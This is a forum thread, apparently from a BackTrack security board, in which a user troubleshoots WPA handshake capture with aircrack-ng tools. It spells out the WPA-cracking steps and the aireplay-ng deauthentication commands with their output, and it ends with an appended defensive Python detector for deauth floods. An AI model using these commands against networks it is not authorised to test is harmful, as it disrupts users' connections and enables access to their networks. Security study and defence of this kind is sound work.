
Thread: Still have problem capturing WPA handshake

  1. #11 Junior Member | Join Date: Jan 2009 | Posts: 59

    I am using BT3 with linux kernel 2.6.21.5
    Should I upgrade the kernel or not?
    There are only zd1211rw_inject_2.6.26.patch and zd1211rw_inject_2.6.23.patch
    What should I do next?

  2. #12 Member cr1spyj0nes | Join Date: Sep 2008 | Posts: 164

    Why not upgrade to BT4? Have you tried to inject on BT4? An easy way to see is to boot up and log in, open a terminal, type airmon-ng start eth1 and then aireplay-ng --test on your monitor interface; --test basically tests injection.

  3. #13 Junior Member | Join Date: Jan 2009 | Posts: 59

    Code:
    aireplay-ng --test mon0
    For information, no action required: Using gettimeofday() instead of /dev/rtc
    03:24:02  Trying broadcast probe requests...
    03:24:04  No Answer...
    03:24:04  Found 0 APs
    The interface changes to mon0 when it enters monitor mode.

    Code:
    airmon-ng start wlan0 (Not eth1 anymore in BT4...)
    
    Found 1 processes that could cause trouble.
    If airodumo-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
    
    -e
    PID                 Name
    5330               Knetworkmanager
    
    Interface                 Chipset                     Driver
    wlan0                      ZyDAS 1211              zd1211rw - [phy0]
                                                                (monitor mode enabled on mon0)
    I am running both BT3 and BT4 beta using VMware. Does this have any impact?

    Even when I test the injection in both BT3 and BT4 beta, none of them work... T.T
    Is there something wrong with my wireless USB adaptor...?

  4. #14 Super Moderator Archangel-Amael | Join Date: Jan 2010 | Location: Somewhere | Posts: 8,012

    Quote Originally Posted by charlescywong:
    Even when I test the injection in both BT3 and BT4 beta, none of them work... T.T
    Is there something wrong with my wireless USB adaptor...?
    First, please do not double post.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #15 Junior Member | Join Date: Jan 2009 | Posts: 59

    I have read the following post, which indicates that the Hawking HWU8DD rev. B can inject... But I still have problems injecting... even the injection test fails...
    hxxp://forums.remote-exploit.org/showthread.php?t=18309&highlight=injection+HWU8DD

    Do I need to make a fake authentication to the AP first before I de-authenticate the client, or vice versa?
    and
    Do I need to associate with the AP before I do any injection?

  6. #16 Super Moderator Archangel-Amael | Join Date: Jan 2010 | Location: Somewhere | Posts: 8,012

    Quote Originally Posted by charlescywong:
    I have read .... But I still have problem on injecting.
    The problem is obviously with your comprehension.

    Do I need to make a fake authentication to the AP first before I de-authenticate the client, or vice versa?
    and
    Do I need to associate with the AP before I do any injection?
    Since the title of this thread is in regards to WPA, here are the basic steps:
    Start the wireless interface in monitor mode on the specific AP channel
    Start airodump-ng on AP channel with filter for bssid to collect authentication handshake.
    Use aireplay-ng to deauthenticate the wireless client
    Run aircrack-ng to crack the pre-shared key using the authentication handshake
    Since you are having trouble with the capture itself why not have a look at
    this tutorial and follow it through.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #17 Junior Member | Join Date: Jan 2009 | Posts: 59

    Quote Originally Posted by archangel.amael:
    The problem is obviously with your comprehension.

    Since the title of this thread is in regards to WPA, here are the basic steps:
    Start the wireless interface in monitor mode on the specific AP channel
    Start airodump-ng on AP channel with filter for bssid to collect authentication handshake.
    Use aireplay-ng to deauthenticate the wireless client
    Run aircrack-ng to crack the pre-shared key using the authentication handshake
    Since you are having trouble with the capture itself why not have a look at
    this tutorial and follow it through.

    I have actually read through the tutorial from the aircrack-ng website:
    "Tutorial: How to Crack WPA/WPA2" hxxp://www.aircrack-ng.org/doku.php?id=cracking_wpa
    And I followed it step by step...
    Just when I was doing "Step 3 - Use aireplay-ng to deauthenticate the wireless client", I cannot capture any handshakes, no matter how many times I try to send deauth messages to the AP and client...

  8. #18 Member kazalku | Join Date: Feb 2009 | Posts: 416

    Quote Originally Posted by charlescywong:
    I have actually read through the tutorial from the aircrack-ng website:
    "Tutorial: How to Crack WPA/WPA2" hxxp://www.aircrack-ng.org/doku.php?id=cracking_wpa
    And I followed it step by step...
    Just when I was doing "Step 3 - Use aireplay-ng to deauthenticate the wireless client", I cannot capture any handshakes, no matter how many times I try to send deauth messages to the AP and client...
    Can we have your commands and actual output?
    Please copy them directly from the console.
    Thanks

  9. #19 Junior Member | Join Date: Jan 2009 | Posts: 59

    Code:
    bt ~ # airmon-ng stop eth1
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode disabled)
    
    bt ~ # airmon-ng start eth1 4
    
    
    Found 1 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    3520    dhcpcd
    
    
    Interface       Chipset         Driver
    
    eth1            ZyDAS 1211      zd1211rw (monitor mode enabled)
    
    
    bt ~ # iwconfig
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    eth1      IEEE 802.11b/g  ESSID:off/any  Nickname:"zd1211"
              Mode:Monitor  Frequency:2.472 GHz  Access Point: Invalid
              Bit Rate=1 Mb/s
              Encryption key:off
              Link Quality:0  Signal level:0  Noise level:0
              Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
              Tx excessive retries:0  Invalid misc:0   Missed beacon:0
    
    bt ~ # airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1
    
    (Then it starts capturing packets.....)
    
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:08:58  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 13
    06:08:58  eth1 is on channel 13, but the AP uses channel 4
    bt ~ # aireplay-ng -0 10 -a 00:11:6B:18:EB:F6 -c 00:16:EA:C8:27:30 eth1
    06:09:02  Waiting for beacon frame (BSSID: 00:11:6B:18:EB:F6) on channel 4
    06:09:03  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:04  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:05  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:06  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 6| 2 ACKs]
    06:09:07  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:08  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:09  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:11  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    06:09:11  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 0| 0 ACKs]
    06:09:12  Sending 64 directed DeAuth. STMAC: [00:16:EA:C8:27:30] [ 1| 0 ACKs]
    bt ~ #
    I can't capture any handshake...>.< Why?

  10. #20 Member kazalku | Join Date: Feb 2009 | Posts: 416

    Give the full output of:

    airodump-ng -c 4 --bssid 00:11:6B:18:EB:F6 -w wpa20090315 eth1

    (Then it starts capturing packets.....)

    I can clearly see that your deauth is not working.
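The aireplay-ng output in post #19 shows what a deauth burst looks like from the sender's side: each "Sending 64 directed DeAuth" line is 64 spoofed deauthentication frames carrying the AP's BSSID as source and the station as destination, all inside about one second. The block below is an added example, not code from the thread or from the aircrack-ng project, showing how a monitor-mode wireless IDS sensor can detect that burst on the air: the frame records, the sliding-window threshold and the function names are constructed for illustration, and only the two MAC addresses are taken from the thread.

```python
from collections import defaultdict, deque

# MAC addresses quoted in the thread; every frame record below is constructed.
AP = "00:11:6B:18:EB:F6"
STA = "00:16:EA:C8:27:30"


def constructed_frames():
    """Frames as a monitor-mode sensor might log them:
    (timestamp_seconds, subtype, source_mac, destination_mac)."""
    frames = [
        (0.0, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
        (0.5, "data", STA, AP),
        (1.0, "deauth", AP, STA),  # a single deauth, as a real AP may send
    ]
    # aireplay-ng style burst: one "Sending 64 directed DeAuth" line in the
    # thread corresponds to 64 frames from the BSSID to the station in ~1 s.
    frames += [(10.0 + i / 64, "deauth", AP, STA) for i in range(64)]
    frames.append((11.2, "data", STA, AP))  # station reconnects and sends data
    return frames


def detect_deauth_floods(frames, threshold=10, window=1.0):
    """Alert on (src, dst) pairs that reach `threshold` deauth or disassoc
    frames inside a sliding `window` of seconds.

    A spoofed deauth carries the AP's own address as source, so the key is the
    address pair, not the attacker's real hardware address. The alert fires
    when the count in the window reaches the threshold; once the window drains
    a later burst can alert again. The mitigation is 802.11w Protected
    Management Frames: a client that negotiated PMF discards unprotected
    deauth frames, so the spoofed burst no longer disconnects it."""
    recent = defaultdict(deque)
    alerts = []
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) == threshold:
            alerts.append({"src": src, "dst": dst,
                           "first_seen": q[0], "count": len(q)})
    return alerts
```

With the constructed sample the lone deauth at t=1.0 stays below the threshold while the 64-frame burst at t=10 raises one alert keyed on the AP-to-station pair.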
